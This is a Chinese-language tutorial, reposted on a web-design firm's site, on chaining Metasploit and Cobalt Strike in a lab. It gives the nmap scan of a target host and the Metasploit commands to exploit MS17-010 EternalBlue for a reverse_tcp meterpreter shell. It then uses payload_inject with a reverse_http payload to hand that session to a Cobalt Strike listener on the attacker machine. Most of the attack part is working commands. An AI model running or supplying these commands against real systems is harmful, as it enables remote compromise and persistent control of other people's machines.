本篇文章為大家展示了如何進(jìn)行MSF和CobaltStrike聯(lián)動(dòng)，內(nèi)容簡(jiǎn)明扼要并且容易理解，絕對(duì)能使你眼前一亮，通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。

為大英等地區(qū)用戶(hù)提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù)，及大英網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、大英網(wǎng)站設(shè)計(jì)，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專(zhuān)業(yè)、用心的態(tài)度為用戶(hù)提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶(hù)的要求，就會(huì)得到認(rèn)可，從而選擇與我們長(zhǎng)期合作。這樣，我們也可以走得更遠(yuǎn)！

0x00環(huán)境介紹

攻擊機(jī)：192.168.60.129 (kali)

受害機(jī)：192.168.60.131

網(wǎng)關(guān)：192.168.60.2

工具：nmap、metaspolit、cobaltstrike

0x01攻擊準(zhǔn)備

首先部署受害主機(jī)調(diào)制網(wǎng)卡可以互相通信。

接下來(lái)部署web應(yīng)用服務(wù)，搞的看起來(lái)像是真實(shí)的應(yīng)用服務(wù)器一樣哈

0x02前攻擊階段

通過(guò)使用nmap信息收集發(fā)現(xiàn)開(kāi)放端口445、3389及操作系統(tǒng)版本信息。

nmap -A 192.168.60.131   

通過(guò)信息收集發(fā)現(xiàn)系統(tǒng)開(kāi)放445端口，使用工具檢測(cè)是否存在ms17_010漏洞，發(fā)現(xiàn)存在。

接近著神器1 Metaspolit上場(chǎng)

首先打開(kāi)msf，進(jìn)行漏洞利用

1.搜索利用漏洞模塊

search ms17_010    

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

獲得session

進(jìn)入meterpreter會(huì)話(huà)。

接近著神器2Cobaltstrike上場(chǎng)

如果覺(jué)得功能太少，也可以和Cobaltstrike聯(lián)動(dòng)

啟動(dòng)Cobaltstrike 

現(xiàn)在獲得是一個(gè)MSF的meterpreter類(lèi)型的session，且session id為1

在Cobaltstrike新建一個(gè)監(jiān)聽(tīng)，配置如下： 

在MSF中設(shè)置如下

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1

exploit

這樣就可以看到在Cobaltstrike中獲取到了了MSF彈回的Meterpreter會(huì)話(huà)。

最后可以使用Cobaltstrike中集成的滲透模塊進(jìn)行進(jìn)一步的測(cè)試。

注：只有Meterpreter類(lèi)型的session才能派生給Cobaltstrike。

上述內(nèi)容就是如何進(jìn)行MSF和CobaltStrike聯(lián)動(dòng)，你們學(xué)到知識(shí)或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

本文標(biāo)題：如何進(jìn)行MSF和CobaltStrike聯(lián)動(dòng)
分享地址：http://www.rwnh.cn/article48/jipghp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站導(dǎo)航、企業(yè)建站、自適應(yīng)網(wǎng)站、用戶(hù)體驗(yàn)、軟件開(kāi)發(fā)、移動(dòng)網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)